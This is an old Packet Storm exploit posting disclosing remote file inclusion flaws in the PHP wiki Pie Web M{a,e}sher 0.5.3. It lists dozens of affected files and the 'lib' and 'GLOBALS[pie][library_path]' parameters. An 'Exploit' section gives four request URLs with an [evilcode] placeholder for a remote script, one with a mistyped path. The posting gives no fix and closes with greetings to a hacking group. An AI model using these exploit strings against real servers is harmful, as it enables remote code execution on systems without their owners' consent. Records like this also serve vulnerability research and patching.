pieweb-rfi.txt

2008-11-25T00:00:00
ID PACKETSTORM:72258
Type packetstorm
Reporter NoGe
Modified 2008-11-25T00:00:00

Description

                                        
                                            `===========================================================================================  
  
  
[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability  
  
Software : Pie Web M{a,e}sher version 0.5.3  
Vendor : http://pie.ekkaia.org/  
Download : http://pie.ekkaia.org/page/Download  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
===========================================================================================  
  
  
[o] Vulnerable file  
  
all file below is affected by "lib" parameter  
  
lib/action/alias.php  
lib/action/cancel.php  
lib/action/context.php  
lib/action/deadlinks.php  
lib/action/delete.php  
lib/action/diff.php  
lib/action/download.php  
lib/action/dump.php  
lib/action/edit.php  
lib/action/fileimport.php  
lib/action/fileinfo.php  
lib/action/filelist.php  
lib/action/goto.php  
lib/action/history.php  
lib/action/image.php  
lib/action/latest.php  
lib/action/links.php  
lib/action/logflush.php  
lib/action/login.php  
lib/action/logout.php  
lib/action/logshow.php  
lib/action/maintenance.php  
lib/action/page.php  
lib/action/pageimport.php  
lib/action/pageinfo.php  
lib/action/pagelist.php  
lib/action/password.php  
lib/action/preview.php  
lib/action/purge.php  
lib/action/referers.php  
lib/action/register.php  
lib/action/rename.php  
lib/action/revert.php  
lib/action/rss.php  
lib/action/search.php  
lib/action/show.php  
lib/action/source.php  
lib/action/systeminfo.php  
lib/action/update.php  
lib/action/upgrade.php  
lib/action/upload.php  
lib/action/useradd.php  
lib/action/userdel.php  
lib/action/useredit.php  
lib/action/userimport.php  
lib/action/userinfo.php  
lib/action/userlist.php  
lib/action/version.php  
lib/action/wipe.php  
  
all file below is affected by "GLOBALS[pie][library_path]" parameter  
  
lib/class/diff.php  
lib/class/file.php  
lib/class/locale.php  
lib/class/mapfile.php  
lib/class/page.php  
lib/class/user.php  
lib/class/userpref.php  
lib/compiler/html.php  
lib/share/auth.php  
lib/share/errorimage.php  
lib/share/link.php  
lib/share/log.php  
lib/share/private.php  
lib/share/referers.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]  
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]  
http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]  
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]  
  
  
===========================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/blog/]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa  
H312Y yooogy mousekill }^-^{ kaka11 martfella  
skulmatic olibekas ulga Cungkee k1tk4t str0ke  
  
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]  
  
===========================================================================================  
  
`